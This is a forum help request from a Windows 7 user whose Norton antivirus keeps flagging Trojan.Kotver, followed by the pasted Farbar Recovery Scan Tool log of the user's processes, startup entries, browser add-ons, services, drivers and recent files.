Jump to content

Welcome to Geeks to Go - Register now for FREE

Need help with your computer or device? Want to learn new tech skills? You're in the right place!
Geeks to Go is a friendly community of tech experts who can solve any problem you have. Just create a free account and post your question. Our volunteers will reply quickly and guide you through the steps. Don't let tech troubles stop you. Join Geeks to Go now and get the support you need!

How it Works Create Account
Photo

Trojan.kotver!gm2 removal

Started by dalemccollum , Nov 12 2016 05:55 PM

  • Please log in to reply

#1
dalemccollum
Posted 12 November 2016 - 05:55 PM

dalemccollum

    New Member

  • Member
  • Pip
  • 4 posts

I have Windows 7.  I am running Norton Security software.  I keep getting Security Request, Restart Required, Your computer must restart to continue removing Security Risks.  I've restarted several times in the past and I still get the pop ups.  I checked the Security History, unresolved Security Risks and found the following:  Trojan.Kotver!gm2 and Trojan.Kotver!bat.  I followed the advice of Geeks to GO and ran FRST.64.exe and scanned.  I got (2) window pop ups for text. 

 

Here's the FRST.txt:

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 12-11-2016
Ran by Dale (administrator) on FAMROOM2 (12-11-2016 17:37:02)
Running from C:\Users\Dale\Downloads
Loaded Profiles: Dale (Available Profiles: Dale)
Platform: Windows 7 Professional Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\ClientX64\officeclicktorun.exe
(Pulse Secure, LLC) C:\Program Files (x86)\Juniper Networks\Common Files\dsNcService.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Security\Engine\22.8.0.50\ns.exe
(LULU SOFTWARE LIMITED) C:\Program Files\Soda PDF Desktop\creator-ws.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Hewlett-Packard Co.) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Hewlett-Packard Co.) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqste08.exe
(Hewlett-Packard Co.) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqbam08.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgpc01.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Security\Engine\22.8.0.50\ns.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
(HP Inc.) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\root\office15\OUTLOOK.EXE
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\splwow64.exe
(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
 
 
==================== Registry (Whitelisted) ====================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-2722837513-1420934957-2528714982-1000\...\Run: [**kunlt<*>] => "C:\Users\Dale\AppData\Local\e2f44a7\015e8c8.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-2722837513-1420934957-2528714982-1000\...\Policies\Explorer: [NoInstrumentation] 1
ShellIconOverlayIdentifiers: [  OverlayExcluded] -> {4433A54A-1AC8-432F-90FC-85F045CF383C} => C:\Program Files (x86)\Norton Security\Engine64\22.8.0.50\buShell.dll [2016-09-23] (Symantec Corporation)
ShellIconOverlayIdentifiers: [  OverlayPending] -> {F17C0B1E-EF8E-4AD4-8E1B-7D7E8CB23225} => C:\Program Files (x86)\Norton Security\Engine64\22.8.0.50\buShell.dll [2016-09-23] (Symantec Corporation)
ShellIconOverlayIdentifiers: [  OverlayProtected] -> {476D0EA3-80F9-48B5-B70B-05E677C9C148} => C:\Program Files (x86)\Norton Security\Engine64\22.8.0.50\buShell.dll [2016-09-23] (Symantec Corporation)
ShellIconOverlayIdentifiers: [ SkyDrivePro1 (ErrorConflict)] -> {8BA85C75-763B-4103-94EB-9470F12FE0F7} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-04-19] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [ SkyDrivePro2 (SyncInProgress)] -> {CD55129A-B1A1-438E-A425-CEBC7DC684EE} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-04-19] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [ SkyDrivePro3 (InSync)] -> {E768CD3B-BDDC-436D-9C13-E1B39CA257B1} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-04-19] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [AsusWSShellExt_B] -> {6D4133E5-0742-4ADC-8A8C-9303440F7190} => C:\Program Files (x86)\ASUS\ASUS WebStorage\3.0.94.193\ASUSWSShellExt64.dll [2011-04-10] (eCareme Technologies, Inc.)
ShellIconOverlayIdentifiers: [AsusWSShellExt_O] -> {64174815-8D98-4CE6-8646-4C039977D808} => C:\Program Files (x86)\ASUS\ASUS WebStorage\3.0.94.193\ASUSWSShellExt64.dll [2011-04-10] (eCareme Technologies, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HP Digital Imaging Monitor.lnk [2016-11-04]
ShortcutTarget: HP Digital Imaging Monitor.lnk -> C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe (Hewlett-Packard Co.)
Startup: C:\Users\Dale\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d159507.lnk [2016-11-12]
ShortcutTarget: d159507.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Startup: C:\Users\Dale\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\e84c097.lnk [2016-11-12]
ShortcutTarget: e84c097.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{914D5341-FF59-4437-84A4-834F53EAC3C5}: [DhcpNameServer] 192.168.1.254
 
Internet Explorer:
==================
HKU\S-1-5-21-2722837513-1420934957-2528714982-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://yahoo.com/
HKU\S-1-5-21-2722837513-1420934957-2528714982-1000\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://www.ebay.com/
SearchScopes: HKU\S-1-5-21-2722837513-1420934957-2528714982-1000 -> DefaultScope {AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} URL = hxxps://nortonsafe.search.ask.com/web?q={searchTerms}&o=APN11913&l=dis&prt=NS&chn=1000&geo=US&ver=22&locale=en_US&gct=kwd&qsrc=2869
SearchScopes: HKU\S-1-5-21-2722837513-1420934957-2528714982-1000 -> {AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} URL = hxxps://nortonsafe.search.ask.com/web?q={searchTerms}&o=APN11913&l=dis&prt=NS&chn=1000&geo=US&ver=22&locale=en_US&gct=kwd&qsrc=2869
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\Office15\OCHelper.dll [2016-03-15] (Microsoft Corporation)
BHO: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Security\Engine64\22.8.0.50\coIEPlg.dll [2016-09-23] (Symantec Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\Office15\URLREDIR.DLL [2016-03-15] (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-04-19] (Microsoft Corporation)
BHO-x32: HP Print Enhancer -> {0347C33E-8762-4905-BF09-768834316C61} -> C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\hpswp_printenhancer.dll [2009-10-22] (Hewlett-Packard Co.)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Microsoft Office\Office15\OCHelper.dll [2016-03-15] (Microsoft Corporation)
BHO-x32: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Security\Engine\22.8.0.50\coIEPlg.dll [2016-09-23] (Symantec Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\ssv.dll [2016-10-07] (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO-x32: Soda PDF Desktop Helper -> {A2792EEC-6618-4C4C-8ECF-B51ECB5DC2A1} -> C:\Program Files (x86)\Soda PDF Desktop\creator-ie-helper.dll [2016-10-21] (LULU SOFTWARE LIMITED)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Microsoft Office\Office15\URLREDIR.DLL [2016-03-15] (Microsoft Corporation)
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Microsoft Office\Office15\GROOVEEX.DLL [2016-04-19] (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\jp2ssv.dll [2016-10-07] (Oracle Corporation)
BHO-x32: HP Smart BHO Class -> {FFFFFFFF-CF4E-4F2B-BDC2-0E72E116A856} -> C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\hpswp_BHO.dll [2009-10-22] (Hewlett-Packard Co.)
Toolbar: HKLM - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security\Engine64\22.8.0.50\coIEPlg.dll [2016-09-23] (Symantec Corporation)
Toolbar: HKLM-x32 - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security\Engine\22.8.0.50\coIEPlg.dll [2016-09-23] (Symantec Corporation)
Toolbar: HKLM-x32 - Soda PDF Desktop Toolbar - {D53D09FE-B1AC-4EE8-AE26-FD43D8B4B62F} - C:\Program Files (x86)\Soda PDF Desktop\creator-ie-plugin.dll [2016-10-21] (LULU SOFTWARE LIMITED)
Toolbar: HKU\S-1-5-21-2722837513-1420934957-2528714982-1000 -> No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  No File
Toolbar: HKU\S-1-5-21-2722837513-1420934957-2528714982-1000 -> Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security\Engine64\22.8.0.50\coIEPlg.dll [2016-09-23] (Symantec Corporation)
DPF: HKLM {AA570693-00E2-4907-B6F1-60A1199B030C} hxxps://juniper.net/dana-cached/sc/JuniperSetupClient64.cab
DPF: HKLM-x32 {E06E2E99-0AA1-11D4-ABA6-0060082AA75C} hxxps://akamaicdn.webex.com/client/WBXclient-T30L10NSP5EP2-10002/webex/ieatgpc1.cab
DPF: HKLM-x32 {F27237D7-93C8-44C2-AC6E-D6057B9A918F} hxxps://continentalra.clio.medcity.net/dana-cached/sc/JuniperSetupClient.cab
Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\Office15\MSOSB.DLL [2016-01-17] (Microsoft Corporation)
Handler-x32: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Microsoft Office\Office15\MSOSB.DLL [2016-01-17] (Microsoft Corporation)
 
FireFox:
========
FF HKLM\...\Firefox\Extensions: [{C1A2A613-35F1-4FCF-B27F-2840527B6556}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NS_22.7.0.76\coFFAddon
FF Extension: (Norton Security Toolbar) - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NS_22.7.0.76\coFFAddon [2016-10-15]
FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Program Files\Soda PDF Desktop\resources\sodapdfdesktopfirefoxextension
FF Extension: (Soda PDF Desktop Creator) - C:\Program Files\Soda PDF Desktop\resources\sodapdfdesktopfirefoxextension [2016-11-08] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{C1A2A613-35F1-4FCF-B27F-2840527B6556}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NS_22.7.0.76\coFFAddon
FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3
FF Extension: (HP Smart Web Printing) - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3 [2016-11-04] [not signed]
FF HKU\S-1-5-21-2722837513-1420934957-2528714982-1000\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL [2016-01-17] (Microsoft Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.101.2 -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\dtplugin\npDeployJava1.dll [2016-10-07] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.101.2 -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\plugin2\npjp2.dll [2016-10-07] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2016-01-17] (Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Microsoft Office\Office15\NPSPWRAP.DLL [2016-01-17] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-28] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-28] (Google Inc.)
FF Plugin-x32: Soda PDF Desktop -> C:\Program Files (x86)\Soda PDF Desktop\np-previewer.dll [2016-10-21] (LULU SOFTWARE LIMITED)
FF Plugin HKU\S-1-5-21-2722837513-1420934957-2528714982-1000: @citrixonline.com/appdetectorplugin -> C:\Users\Dale\AppData\Local\Citrix\Plugins\104\npappdetector.dll [2016-07-12] (Citrix Online)
 
Chrome: 
=======
CHR DefaultSearchURL: Default -> hxxps://nortonsafe.search.ask.com/web?q={searchTerms}&o=APN11908&prt=cr
CHR DefaultSearchKeyword: Default -> NortonSafe
CHR DefaultSuggestURL: Default -> hxxps://ss-sym.search.ask.com/ss?q={searchTerms}&li=ff
CHR Profile: C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default [2016-11-12]
CHR Extension: (Google Slides) - C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2016-02-22]
CHR Extension: (Google Docs) - C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-02-22]
CHR Extension: (Google Drive) - C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-02-22]
CHR Extension: (YouTube) - C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-02-22]
CHR Extension: (Norton Security Toolbar) - C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default\Extensions\cjabmdjcfcfdmffimndhafhblfmpjdpe [2016-09-17]
CHR Extension: (Google Search) - C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-02-22]
CHR Extension: (Google Sheets) - C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-02-22]
CHR Extension: (Google Docs Offline) - C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-14]
CHR Extension: (Norton Identity Safe) - C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default\Extensions\iikflkcanblccfahdhdonehdalibjnif [2016-02-22]
CHR Extension: (Norton Safe) - C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmgcfemagnogdodbambjhdcmfcpicngl [2016-09-17]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-02]
CHR Extension: (Gmail) - C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-02-22]
CHR Extension: (Chrome Media Router) - C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-10-28]
CHR HKLM\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files (x86)\Norton Security\Engine\22.8.0.50\Exts\Chrome.crx [2016-10-15]
CHR HKLM\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files (x86)\Norton Security\Engine\22.8.0.50\Exts\Chrome.crx [2016-10-15]
CHR HKLM-x32\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx
 
==================== Services (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S4 AMD_RAIDXpert; C:\Program Files (x86)\AMD\RAIDXpert\bin\RAIDXpertService.exe [122880 2009-12-15] (AMD) [File not signed]
S4 AsSysCtrlService; C:\ProgramData\ASUS\AsSysCtrlService\2.00.00\AsSysCtrlService.exe [96896 2009-12-28] (ASUSTeK Computer Inc.)
R2 ClickToRunSvc; C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe [2829552 2016-03-08] (Microsoft Corporation)
S4 DiskDoctorService; C:\Program Files (x86)\Symantec\Norton Utilities 16\Tools\Disk Doctor\DiskDoctorSrv.exe [1147424 2012-09-29] (Symantec Corporation)
R2 dsNcService; C:\Program Files (x86)\Juniper Networks\Common Files\dsNcService.exe [674136 2015-10-22] (Pulse Secure, LLC)
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [29728 2016-08-15] (HP Inc.)
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2010-08-06] (Hewlett-Packard) [File not signed]
R2 NS; C:\Program Files (x86)\Norton Security\Engine\22.8.0.50\NS.exe [289080 2016-09-23] (Symantec Corporation)
S4 NU16StartManagerSvc; C:\Program Files (x86)\Symantec\Norton Utilities 16\sMonitor\StartManSvc.exe [792608 2012-09-29] (Symantec)
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2010-08-06] (Hewlett-Packard) [File not signed]
S3 Soda PDF Desktop; C:\Program Files\Soda PDF Desktop\ws.exe [2529744 2016-10-21] (LULU SOFTWARE LIMITED)
S3 Soda PDF Desktop CrashHandler; C:\Program Files\Soda PDF Desktop\crash-handler-ws.exe [925648 2016-10-21] (LULU SOFTWARE LIMITED)
R2 Soda PDF Desktop Creator; C:\Program Files\Soda PDF Desktop\creator-ws.exe [733648 2016-10-21] (LULU SOFTWARE LIMITED)
S4 SpeedDiskService; C:\Program Files (x86)\Symantec\Norton Utilities 16\Tools\SpeedDisk\SpeedDiskSrv.exe [1160224 2012-09-29] (Symantec Corporation)
S4 VIAKaraokeService; C:\Windows\system32\viakaraokesrv.exe [27760 2011-11-11] (VIA Technologies, Inc.)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-26] (Microsoft Corporation)
 
===================== Drivers (Whitelisted) ======================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [13440 2010-08-23] ()
R1 AsUpIO; C:\Windows\SysWow64\drivers\AsUpIO.sys [13368 2009-07-05] ()
R1 BHDrvx64; C:\Program Files (x86)\Norton Security\NortonData\22.7.0.76\Definitions\BASHDefs\20161102.001\BHDrvx64.sys [1854712 2016-08-18] (Symantec Corporation)
R1 ccSet_NS; C:\Windows\system32\drivers\NSx64\1608000.032\ccSetx64.sys [174328 2016-06-01] (Symantec Corporation)
S3 ebdrv; C:\Windows\system32\drivers\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [497368 2016-10-04] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [156888 2016-10-04] (Symantec Corporation)
R1 IDSVia64; C:\Program Files (x86)\Norton Security\NortonData\22.7.0.76\Definitions\IPSDefs\20161111.001\IDSvia64.sys [1012952 2016-10-27] (Symantec Corporation)
R3 MTsensor; C:\Windows\System32\DRIVERS\ASACPI.sys [15416 2009-07-16] ()
R1 SRTSP; C:\Windows\System32\Drivers\NSx64\1608000.032\SRTSP64.SYS [784624 2016-09-23] (Symantec Corporation)
R1 SRTSPX; C:\Windows\system32\drivers\NSx64\1608000.032\SRTSPX64.SYS [49400 2016-09-23] (Symantec Corporation)
R0 SymEFASI; C:\Windows\System32\drivers\NSx64\1608000.032\SYMEFASI64.SYS [1628888 2016-09-23] (Symantec Corporation)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT64x86.SYS [100592 2016-10-15] (Symantec Corporation)
R1 SymIRON; C:\Windows\system32\drivers\NSx64\1608000.032\Ironx64.SYS [289520 2016-09-23] (Symantec Corporation)
R1 SymNetS; C:\Windows\System32\Drivers\NSx64\1608000.032\SYMNETS.SYS [567512 2016-09-23] (Symantec Corporation)
S3 NAVENG; \??\C:\Program Files (x86)\Norton Security\NortonData\22.7.0.76\Definitions\SDSDefs\20160626.001\ENG64.SYS [X]
S3 NAVEX15; \??\C:\Program Files (x86)\Norton Security\NortonData\22.7.0.76\Definitions\SDSDefs\20160626.001\EX64.SYS [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-11-12 17:37 - 2016-11-12 17:37 - 00021756 _____ C:\Users\Dale\Downloads\FRST.txt
2016-11-12 17:31 - 2016-11-12 17:31 - 02411520 _____ (Farbar) C:\Users\Dale\Desktop\FRST64.exe
2016-11-12 17:26 - 2016-11-12 17:37 - 00000000 ____D C:\FRST
2016-11-12 17:26 - 2016-11-12 17:26 - 02411520 _____ (Farbar) C:\Users\Dale\Downloads\FRST64.exe
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00030839.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00030226.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00029972.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00029940.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00029918.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00029280.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00029158.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00028963.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00027846.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00027322.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00026541.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00025928.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00025805.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00025163.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00025012.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00024788.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00024253.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00022551.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00021551.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00020768.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00020508.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00020099.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00019906.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00019714.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00019083.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00019001.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00018937.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00018628.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00018240.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00018051.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00017376.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00017295.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00016852.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00016814.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00016673.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00016164.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00015783.tmp
